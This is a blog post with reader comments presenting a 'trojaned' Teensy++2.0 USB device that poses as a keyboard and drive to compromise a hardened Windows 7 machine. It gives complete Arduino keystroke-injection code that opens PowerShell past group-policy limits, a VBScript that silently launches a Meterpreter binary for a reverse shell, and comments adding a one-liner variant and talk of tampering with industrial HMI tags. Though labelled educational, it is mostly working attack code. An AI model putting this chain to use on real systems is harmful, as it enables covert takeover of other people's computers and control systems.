Just got my teensy from PJRC …
http://www.pjrc.com/store/teensypp.html
This little bugger has a lot of potential and I’ve decided to test it against the mighty Windows7 with all recommended security settings and restrictions. Like the Disabled Autorun and Autoplay through domain policy etc. At the end it was possible to own the box using a technique described below and compromise it. It was fun working on this project so I decided to share my thoughts and code.
The environment setup is well explained on the PJRC site so I’m not gonna go through this here. My current config and libs are as follows:
- Teensy linux loader http://www.pjrc.com/teensy/loader.html
- Arduino-0022 http://arduino.googlecode.com/files/arduino-0022.tgz
- Teensyduinobeta Test 0.93 http://www.pjrc.com/teensy/beta/teensyduino
- PHUKD Library from IronGeek http://www.irongeek.com/downloads/phukdlib0.2.zip
- Linux AVR development tools
(On Debian apt-get install gcc-avr, binutils-avr, avr-libc, gdb-avr)
So with everything in place I’ve decided to create my own trojaned USB device.
Teensy++2.0 comes equipped with about 120 Kilobytes of mass storage that can be used to host our Binary payloads. This needs to be activated within the arduino menu tools like so:
So our Teensy board will act like a USB keyboard and USB Mass storage device together.
Create a new project from the arduino IDE for example : usb-project. This is important because the IDE will create a subfolder by this name in its directory which will be useful later on.
Here is a code that I’ve created to run a meterpreter payload executable off the Teensy after plugging it into the target USB port.
/*The following is Astro's code using the PHUKD libs from Irongeek http://www.irongeek.com/downloads/phukdlib0.2.zip to do some Keyboard stuff with Teensy only for educational purposes. Use at your own risk ! To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html http://www.arduino.cc/en/Reference/HomePage Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID */ #include <phukdlib.h> void setup() { } void loop () { delay(5000); //Wait 5 secs to settle down Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_key1(KEY_ESC); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.print("powershell"); PressAndRelease(KEY_ENTER,1); delay(5000); //Need some time on some machines to open powershell Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string"); PressAndRelease(KEY_ENTER,1); delay(500); Keyboard.print("$drive = $disk.substring(2,2)"); PressAndRelease(KEY_ENTER,1); delay(500); Keyboard.print("invoke-expression $drive"); Keyboard.set_key1(KEY_BACKSLASH); Keyboard.send_now(); Keyboard.print("exec.vbs"); PressAndRelease(KEY_ENTER,1); delay(500); Keyboard.print("exit"); PressAndRelease(KEY_ENTER,1); delay(9000000); }
What this code does:
- It waits for 5 seconds
- Loads Ctrl+Esc keys to open Windows Start Menu (there are group policies which restrict the Win+R combination for example..)
- Runs powershell (While most admins lock down cmd.exe by group policy, the powershell gets omitted. There is a trick to binpatch cmd.exe using a macro with MS Word to get around the restrictions but I’m not gonna cover this here as there is not enough space for a patched cmd.exe on the Teensy anyway.)
- Now this was a trickiest part of it all, spent a whole day figuring how the variables in powershell work :$disk = wmic logicaldisk list brief | select-string -patter tinydisk | out-string Please note the “tinydisk” string here, this is what we are gonna label the FAT12 partition that gets created when we flash the teensy with our code. The powershell environment is a little tricky and weird, as the stdout isn’t handled like a normal string in Linux we need to do a little trick :$drive = $disk.substring(2,2) Only now we get to keep a $string for the Teensy USB drive so we can use it to load the meterpreter payload.invoke-expression $drive\exec.vbs Now for some reason I had to manually load the “Backslash \” key with a regular Keyboard.set_key1(KEY_BACKSLASH) function because the Keyboard.print() does not handle the backslash and the char after it at all. So basically the one line command gets split in multiple parts : Keyboard.print(“invoke-expression $drive”);
Keyboard.set_key1(KEY_BACKSLASH);
Keyboard.send_now();
Keyboard.print(“exec.vbs”);
- So we got to a part where Teensy calls for an exec.vbs file on its mass storage.
- Exit the powershell so it does not stick out on screen.
The exec.vbs is a simple Visual Basic script that silently loads the Meterpreter payload off the Teensy.
Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "\")
sPath=Left(sPath,x)
sCmd = sPath+"final.exe"
oShell.Run sCmd,0,False
In this case we are calling a file called final.exe in the root folder of the Teensy mass storage drive. It executes the final.exe silently without no window popping up. Final.exe is our compiled meterpreter binary payload that will connect back to the multi handler on our pen-test machine.
So before we compile and flash the project onto the Teensy board we need to prepare a few things. First of all the drive label and the files that will reside there. We need to have some unique disklabel for the FAT12 partition on the Teensy because without it we wont be able to find the drive letter assigned to it by Windows. In our case we are using “tinydisk” label.
So open up your terminal and locate your project folder inside the arduino directory and make sure it has the following:
You need to create a folder inside you project direcotry called disk. Inside the disk folder create a file caled .Volumelabel and edit it an place the volumelabel name there -> in this case tinydisk. Next place the needed files into this directory (exec.vbs and final.exe)
So a final scenario is :
Connect the teensy to a loggedon Windows7 machine and let it do its magic. It loads everything automatically and you get rewarded by a remote Reverse meterpreter shell on your pen-test laptop.
This is a basic sum-up of a nasty PoC using the Teensy++2.0 board, some Sploit-Fu, little powershell and some vbscript.
Part 2… Avoiding Antivirus
Part 3… The Final Productg
Astr0baby's not so random thoughts _____ rand() % 100; 
Could this have been simpler if you ran the file from the Teensy without copying it? This looks pretty doable:
for /f “tokens=1” %i in (‘wmic logicaldisk list brief ^| find “MYDISKLABEL”‘) do @%i\final.exe
Thanks for the writeup.
I guess it would but I did not want the final.exe window shown when the payload executable gets started, so thats why I’ve used that vbs script to actually hide the window.
Hey, I really like what you’ve done here, thank you for taking the time to write it up and share it with the community.
This doesn’t achieve anything that you couldn’t do with hands on access to the computer but does buy you some cool stuff, it allows you to “plug and forget” as well as do things faster than you could on your own.
It would be good if there were a way to mask the first stage, where the start menu will open momentarily but as you say Win-R is often disabled.
Thanks for commenting. Sure this does not achieve much but still, there are ways to add the
teensy to an USB mouse or keyboard and trojan the device. Anyways this is more an exercise than a real attack. Next week I will publish some new interesting stuff.
I woud like to use your code in some course material but want to give you full credit. Can you provide an approval of this and information as to how you would like a reference within the material.
Sure Matt, go ahead and use this. As for the reference just use my nick or this blog post.
Awesome … I have my own payload (exec.vbs) I am running to modify an HMI’s tags for a control system environment. The script kills the HMI runtime, swaps in fake tags, and restarts the HMI runtime. Check us out over at cybati.org to see the course I am adding this script in to. Awesome stuff – the concept of hardware hacks / supply chain is daunting!
Pingback: Teensy++2 Metasploit Part. 2 | Astrobaby's random thoughts
Hello…Is there any way to get this to work if USB endpoint protection is in place to stop the use of hard disks/pendrives?
Hi,
well its kinda hard if mass storage is disabled, but its not impossible. You need to program the Teensy only as a HID keyboard and think of an easy way to transfer binary to ascii characters. I’ve prepared a sample solution, but have no time at this moment to convert this to C code for Teensy https://astr0baby.wordpress.com/2012/02/20/reverse-metasploit-payload-bat-pure-ascii/ <– Look here for a hint ;)
Just a tip: The problem you are having with the \ symbol is because this symbol can be used for other things like \n for new line. To output the symbol you just have to use the double \\. it wil output as single and you are good to go :)
Hi, thanks for the tip ! Will try it again sometimes soon.
Hi.
Pretty nice project! I use the Teensy 2.0. HID works, but the Mass Storage Device is not formatted (25.5KB free).
How did you put your files (exec.vbs and final.exe) to the Arduino project? I don’t get it…
Pingback: USB Reloaded: the Teensy Attack – TECH NEWS | THOMAS WILLNER